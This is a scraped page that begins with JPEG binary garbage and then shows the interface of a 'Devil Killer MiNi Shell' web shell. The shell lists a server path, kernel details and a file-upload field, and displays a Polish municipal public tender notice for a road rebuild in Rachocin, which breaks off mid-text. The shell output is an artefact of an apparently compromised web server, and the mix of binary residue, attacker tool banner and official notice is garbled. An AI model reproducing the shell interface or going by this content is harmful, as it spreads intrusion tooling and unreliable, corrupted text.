JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230516/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230516/0021781601-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> &#34;Przebudowa drogi gminnej w m. Rachocin&#34; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Sierpc</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 611015945</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Biskupa Floriana 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sierpc</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">09-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL923 - Płocki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">24 275 57 01</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">24 275 57 01 w. 29</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">info@gmina.sierpc.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.gmina.sierpc.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> &#34;Przebudowa drogi gminnej w m. Rachocin&#34; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e41bc7e2-efdd-11ed-b70f-ae2d9e28ec7b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00217816</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-05-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00045378/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.6 Przebudowa drogi gminnej w m. Rachocin</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-e41bc7e2-efdd-11ed-b70f-ae2d9e28ec7b <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Komunikacja między Zamawiającym <br/> a Wykonawcami odbywa się przy użyciu: Platformy e-Zamówienia, która jest dostępna pod <br/> adresem: https://ezamowienia.gov.pl<br/>2. Adres strony internetowej prowadzonego postępowania (link prowadzący bezpośrednio <br/> do widoku postępowania na Platformie e-Zamówienia:<br/>https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-e41bc7e2-efdd-11ed-b70f-ae2d9e28ec7b<br/>3. Sposób komunikowania się za pośrednictwem Platformy e-Zamówienia został opisany pod <br/> adresem: https://ezamowienia.gov.pl<br/>4. W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację Wykonawcy <br/> i Zamawiającego za pośrednictwem Platformy e-Zamówienia, Zamawiający dopuszcza <br/> komunikację za pomocą (nie dotyczy składania ofert):<br/> - Elektronicznej Skrzynki Podawczej ePUAPu Urzędu Gminy w Sierpcu pod adresem:<br/> /3f4ih06ymt/SkrytkaESP<br/> - poczty elektronicznej na adres e-mail: architektura@gmina.sierpc.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>2. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania <br/> konta na Platformie e-Zamówienia ani logowania.<br/>3. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, <br/> musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe <br/> informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy <br/> e-Zamówienia określa „Regulamin Platformy e-Zamówienia”, dostępny na stronie internetowej <br/> https://ezamowienia.gov.pl oraz zamieszczone w zakładce „Centrum pomocy”.<br/>4. Komunikacja w postępowaniu, przy użyciu platformy e-Zamówienia, z wyłączeniem składania <br/> ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych <br/> w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy <br/> do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie <br/> pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie <br/> załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”). <br/>5. W przypadku załączników, które są zgodnie z ustawą Pzp lub rozporządzeniem Prezesa Rady <br/> Ministrów w sprawie wymagań dla dokumentów elektronicznych opatrzone kwalifikowanym <br/> podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, mogą być opatrzone, <br/> zgodnie z wyborem wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie <br/> zamówienia/podmiotu udostępniającego zasoby, podpisem typu zewnętrznego lub wewnętrznego. <br/> W zależności od rodzaju podpisu i jego typu (zewnętrzny, wewnętrzny) dodaje się uprzednio <br/> podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument <br/> z wszytym podpisem (typ wewnętrzny).<br/>6. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie <br/> wymaga posiadania konta „Wykonawca” na Platformie e-Zamówienia oraz zalogowania się <br/> na Platformie e – Zamówienia. Do korzystania z „Formularzy do komunikacji” służących <br/> do zadawania pytań dotyczących treści dokumentów zamówienia (dotyczy w szczególności <br/> SWZ) wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia.<br/>7. Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są <br/> po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”. <br/>8. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” <br/> wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego <br/> formularza).<br/>9. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług <br/> Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin <br/> Platformy e-Zamówienia.<br/>10. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy <br/> e-Zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego dostępnego pod <br/> numerem telefonu (32) 77 88 999 lub drogą elektroniczną poprzez formularz udostępniony <br/> na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”. <br/> 11. Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących <br/> kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być <br/> zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów w sprawie <br/> wymagań dla dokumentów elektronicznych.<br/>12. W przypadku formatów, o których mowa w art. 66 ust. 1 ustawy PZP ww. regulacje nie będą miały <br/> bezpośredniego zastosowania. <br/>13. Zamawiający zaleca sporządzanie dokumentów elektronicznych w formacie .pdf</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem Pani/Pana danych osobowych przetwarzanych w Urzędzie Gminy <br/> w Sierpcu jest Wójt Gminy Sierpc, ul. Biskupa Floriana 4, 09-200 Sierpc; <br/>2. Administrator – Wójt Gminy Sierpc wyznaczył Inspektora Danych Osobowych, z którym <br/> można się kontaktować pod numerem telefonu: (24) 275 57 01, adres e-mail: <br/> iod@gmina.sierpc.pl <br/>3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu <br/> związanym z postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie <br/> podstawowym na roboty budowlane pn.: „Przebudowa drogi gminnej w m. Rachocin”;<br/>4. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym <br/> udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy pzp; <br/>5. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 pzp przez okres 4 <br/> lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania <br/> umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana <br/> dotyczących jest wymogiem ustawowym określonym w przepisanych ustawy pzp, <br/> związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; <br/> konsekwencje niepodania określonych danych wynikają z ustawy pzp;<br/>7. W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób <br/> zautomatyzowany, stosownie do art. 22 RODO. <br/>8. Posiada Pani/Pan: a) na podstawie art. 15 RODO prawo dostępu do danych osobowych <br/> Pani/Pana dotyczących; b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana <br/> danych osobowych; c) na podstawie art. 18 RODO prawo żądania od administratora <br/> ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania <br/> o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 <br/> ust. 2 RODO; d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, <br/> gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy <br/> RODO; <br/>9. Nie przysługuje Pani/Panu: a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do <br/> usunięcia danych osobowych; b) prawo do przenoszenia danych osobowych, o którym <br/> mowa w art. 20 RODO; c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania <br/> danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 <br/> ust. 1 lit. c RODO;<br/>10. Przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO <br/> przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla <br/> przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.<br/>11. Wykonawca jest zobowiązany, w związku z udziałem w przedmiotowym postępowaniu,<br/> do wypełnienia wszystkich obowiązków formalno-prawnych wymaganych przez RODO <br/> i związanych z udziałem w przedmiotowym postępowaniu o udzielenie zamówienia. <br/> Do obowiązków tych należą:<br/>11.1. obowiązek informacyjny przewidziany w art. 13 RODO względem osób fizycznych, których dane <br/> osobowe dotyczą i od których dane te wykonawca bezpośrednio pozyskał i przekazał <br/> zamawiającemu w treści oferty lub dokumentów składanych na żądanie zamawiającego,<br/>11.2. obowiązek informacyjny wynikający z art. 14 RODO względem osób fizycznych, których dane <br/> wykonawca pozyskał w sposób pośredni, a które to dane wykonawca przekazuje zamawiającemu <br/> w treści oferty lub dokumentów składanych na żądanie zamawiającego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BI.271.6.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Nazwa nadana zamówieniu przez Zamawiającego: „Przebudowa drogi gminnej w m. Rachocin”.<br/><br/>2. Miejsce wykonania zamówienia: Gmina Sierpc (gmina wiejska);<br/> powiat sierpecki, województwo mazowieckie;<br/> obręb ewidencyjny Rachocin;<br/> działki nr ewid. 93 i 100.<br/><br/>3. OPIS PRZEDMIOTU ZAMÓWIENIA.<br/>3.1. Przedmiotem zamówienia jest wykonanie robót budowlanych w oparciu o Opracowanie <br/> Techniczne, Szczegółową Specyfikację Techniczną, Projekt Stałej Organizacji Ruchu <br/> (udostępnione przez Zamawiającego i stanowiące załączniki do SWZ) oraz zgodnie <br/> z obowiązującymi przepisami prawa, normami oraz uwarunkowaniami wynikającymi z niniejszego <br/> zamówienia. <br/>3.2. Przedmiotem zamówienia jest wykonanie przebudowy drogi gminnej po istniejącej nawierzchni <br/> na odcinku o długości 1,274 km, o szerokości jezdni 3,5 m z poboczami po 0,75 m.<br/>3.3. W ramach zadania należy wykonać następujące roboty:<br/> - wyznaczenie trasy i punktów wysokościowych wraz z inwentaryzacją powykonawczą;<br/> - wykonanie warstwy wiążącej z mieszanki mineralno-asfaltowej AC11W50/70, grubość <br/> warstwy po zagęszczeniu 3 cm, z transportem mieszanki samochodami samowyładowczymi <br/> z wytwórni do miejsca wbudowania, po uprzednim oczyszczeniu i skropieniu emulsją <br/> asfaltową warstwy podbudowy;<br/> - wykonanie warstwy ścieralnej z mieszanki mineralno – asfaltowej AC11S50/70, grubość <br/> warstwy po zagęszczeniu 3 cm, z transportem mieszanki samochodami samowyładowczymi <br/> z wytwórni do miejsca wbudowania, po uprzednim oczyszczeniu i skropieniu emulsją asfaltową <br/> warstwy wiążącej;<br/> - ścięcie i uzupełnienie pobocza z kruszywa łamanego 0÷31,5 mm, gr.10 cm po zagęszczeniu;<br/> - ustawienie słupków z rur stalowych dla znaków drogowych i urządzeń bezpieczeństwa ruchu <br/> drogowego oraz tarcz i tablic znaków drogowych odblaskowych oraz tablic urządzeń <br/> bezpieczeństwa ruchu drogowego (wg projektu organizacji ruchu). <br/>3.4. Szczegółowy zakres przedmiotu zamówienia zawarty jest w załącznikach do SWZ<br/> tj. określony jest w opracowaniu technicznym, przedmiarze robót, Szczegółowej Specyfikacji <br/> Technicznej oraz w Projekcie Stałej Organizacji Ruchu. Przedmiar robót jest wyłącznie <br/> pomocniczy przy wycenie oferty. Obowiązuje opracowanie techniczne, Projekt Stałej Organizacji <br/> Ruchu i SST. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45233142-6 - Roboty w zakresie naprawy dróg</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45233290-8 - Instalowanie znaków drogowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-09-29</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty Zamawiający będzie kierował się kryteriami oceny ofert:<br/>1) „Cena” (C) – waga kryterium 60 %;<br/>2) „Okres gwarancji i rękojmi” (GR) – waga kryterium 40 %<br/><br/>2. Kryterium „Cena” będzie rozpatrywane na podstawie ceny brutto za wykonanie przedmiotu <br/> zamówienia podanej przez Wykonawcę w formularzu oferty. <br/> Zamawiający przyzna punkty wg następującego wzoru:<br/><br/> Cena najniższa brutto*<br/>C = ------------------------------------- x 100 pkt x 60%<br/> Cena oferty ocenianej brutto<br/><br/><br/>*spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/><br/>UWAGA! Jeden grosz jest najmniejszą jednostką monetarną w systemie pieniężnym RP i nie jest możliwe wskazanie ceny netto i brutto za pomocą wielkości mniejszych niż 1 grosz.<br/><br/>3. Kryterium - „Okres gwarancji i rękojmi” będzie rozpatrywane na podstawie okresu gwarancji <br/> jakości i rękojmi na roboty objęte przedmiotem zamówienia, podanej przez Wykonawcę <br/> w formularzu oferty, punktowany będzie wg. poniższego schematu na podstawie wskazanego <br/> terminu w formularzu oferty:<br/><br/> GR o – GR min<br/>GR = ------------------ x 100 pkt x 40%<br/> GR max – GR min<br/>Gdzie:<br/>GR max – gwarancja i rękojmia maksymalna (60 m-cy),<br/>GR min – gwarancja i rękojmia minimalna (36 m-cy),<br/>GR o – gwarancja i rękojmia oferty ocenianej (w miesiącach).<br/>Termin gwarancji i rękojmi należy proponować w pełnych miesiącach.<br/>UWAGA: Maksymalna liczba 40 punktów zostanie przyznana za udzielenie 60 m-cy lub <br/> dłuższej gwarancji i rękojmi na wykonany przedmiot zamówienia. W przypadku <br/> zaoferowania gwarancji i rękojmi dłuższej niż 60 m-cy, do oceny kryterium będzie brany <br/> okres gwarancji i rękojmi maksymalny.<br/><br/>Minimalny okres gwarancji jakości rękojmi dla robót budowlanych – 36 m-cy. Zaoferowanie krótszego okresu gwarancji spowoduje odrzucenie oferty. Jeżeli Wykonawca nie wypełni zobowiązania dotyczącego okresu gwarancji i rękojmi, Zamawiający uzna, że okres gwarancji i rękojmi został udzielony na 36 miesięcy. Każdy kolejny miesiąc nie spowoduje zwiększenia ilości przyznanych punktów.<br/><br/>4. Za najkorzystniejszą zostanie uznana oferta z największą ilością punktów, stanowiących <br/> sumę punktów przyznanych w każdym kryterium z uwzględnieniem wagi procentowej <br/> danego kryterium, obliczonych wg wzoru:<br/>P = C + GR<br/>gdzie:<br/>C – liczba punktów przyznana ofercie ocenianej w kryterium „Cena”,<br/>G – liczba punktów przyznana ofercie ocenianej w kryterium „Okres Gwarancji i Rękojmi”<br/>P – łączna liczba punktów przyznana ofercie ocenianej<br/><br/>5. Punkty zostaną zaokrąglone do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1.1. Złożyli ofertę niepodlegającą odrzuceniu na podstawie art. 226 ust. 1 ustawy Pzp;<br/>1.2. Nie podlegają wykluczeniu na zasadach określonych w SWZ;<br/>1.3. Spełniają warunki udziału w postępowaniu dotyczące:<br/><br/>1) zdolności do występowania w obrocie gospodarczym:<br/> Zamawiający nie stawia warunku w powyższym zakresie.<br/><br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika <br/> to z odrębnych przepisów:<br/> Zamawiający nie stawia warunku w powyższym zakresie.<br/><br/>3) sytuacji ekonomicznej lub finansowej:<br/> Zamawiający uzna, że Wykonawca spełnia ten warunek jeżeli jest ubezpieczony <br/> od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej <br/> z przedmiotem zamówienia na sumę gwarancyjną w wysokości nie mniejszej niż <br/> 400.000,00 zł (słownie: czterysta 